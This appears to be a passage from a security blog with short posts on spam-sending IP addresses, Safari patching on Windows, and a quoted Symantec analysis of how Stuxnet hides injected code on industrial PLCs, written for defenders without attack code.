    http://www.trustedsource.org/query/62.235.242.195

    http://www.trustedsource.org/query/62.235.249.90

    http://www.trustedsource.org/query/81.11.183.156

    and so on

    this means that all those posts are sending spam and viruses on the world wide web, where they have been captured by honeypots.

    this means that the ISPs have a problem with their argument that they are defending their walls instead of offering free security software to their clients as the New Telecom asks them to

  • patching and security of Apple software on Windows comes second

    When I read this blog post by the researcher who found another critical bug in Safari (Swiss cheese), the following is clear

    * the internal security tests for Safari are not sufficient

    * they first fix the bug for the Apple environment and then eventually research and patch the bug for the Windows environment

    If this is true, it changes the risk of letting users use Safari (or maybe any other Apple software) on your Windows network..... If you even thought that would be a good idea.

  • an absolute must read for people working with SCADA and critical infrastructure

    If what is written in this blog weren't that important I wouldn't have copied it in its entirety. But if you read what the researchers have found out about Stuxnet (the father of the .lnk vulnerability that is now also present in documents), you will see that you will have to monitor every change of code that happens on a machine. For the moment this is only for these particular installations, but it may be the next generation of rootkits, which we maybe should call 'codekits': they replace one set of code with another without changing anything on the outside in the availability and functionality of the machine or application.

    "As we’ve explained in our recent W32.Stuxnet blog series, Stuxnet infects Windows systems in its search for industrial control systems, often generically (but incorrectly) known as SCADA systems. Industrial control systems consist of Programmable Logic Controllers (PLCs), which can be thought of as mini-computers that can be programmed from a Windows system. These PLCs contain special code that controls the automation of industrial processes—for instance, to control machinery in a plant or a factory. Programmers use software (e.g., on a Windows PC) to create code and then upload their code to the PLCs.

    Previously, we reported that Stuxnet can steal code and design projects and also hide itself using a classic Windows rootkit, but unfortunately it can also do much more. Stuxnet has the ability to take advantage of the programming software to also upload its own code to the PLC in an industrial control system that is typically monitored by SCADA systems. In addition, Stuxnet then hides these code blocks, so when a programmer using an infected machine tries to view all of the code blocks on a PLC, they will not see the code injected by Stuxnet. Thus, Stuxnet isn’t just a rootkit that hides itself on Windows, but is the first publicly known rootkit that is able to hide injected code located on a PLC.

    In particular, Stuxnet hooks the programming software, which means that when someone uses the software to view code blocks on the PLC, the injected blocks are nowhere to be found. This is done by hooking enumeration, read, and write functions so that you can’t accidentally overwrite the hidden blocks as well.

    Stuxnet contains 70 encrypted code blocks that appear to replace some “foundation routines” that take care of simple yet very common tasks, such as comparing file times and others that are custom code and data blocks. Before some of these blocks are uploaded to the PLC, they are customized depending on the PLC.

    By writing code to the PLC, Stuxnet can potentially control or alter how the system operates. A previous historic example includes a reported case of stolen code that impacted a pipeline. Code was secretly “Trojanized” to function properly and only some time after installation instruct the host system to increase the pipeline's pressure beyond its capacity. This resulted in a three kiloton explosion, about 1/5 the size of the Hiroshima bomb.

    Thus, in addition to cleaning up the Stuxnet malware, administrators with machines infected with Stuxnet need to audit for unexpected code in their PLC devices. We are still examining some of the code blocks to determine exactly what they do and will have more information soon on how Stuxnet impacts real-world industrial control systems.

    Finally, we’ve reserved the in-depth technical details on how Stuxnet achieves this rootkit functionality for a future technical whitepaper, which will delve into other features of Stuxnet as well that we haven’t had a chance to blog about. For example, a couple of other interesting things include the fact that it uses an infection counter before deleting itself (it is set to ‘3’) and also can use MS08-067, the same vulnerability used by Downadup (a.k.a. Conficker) to spread.

    So, please stay tuned.
    http://www.symantec.com/connect/blogs/stuxnet-introduces-first-known-rootkit-scada-devices"

    This will be a must-read report that will make waves and may be the first step towards making version control and tripwire-like monitoring an integrated part of infrastructure and applications.

    Sorry for copying, but this post is so well written, and you should read it now and not later when you have time, that I have copied it in its entirety. I do this very, very seldom and only because of the enormous importance of what has been discovered.

    Said somebody something about holidays ? Maybe all those hackers and malwaremakers were bored .....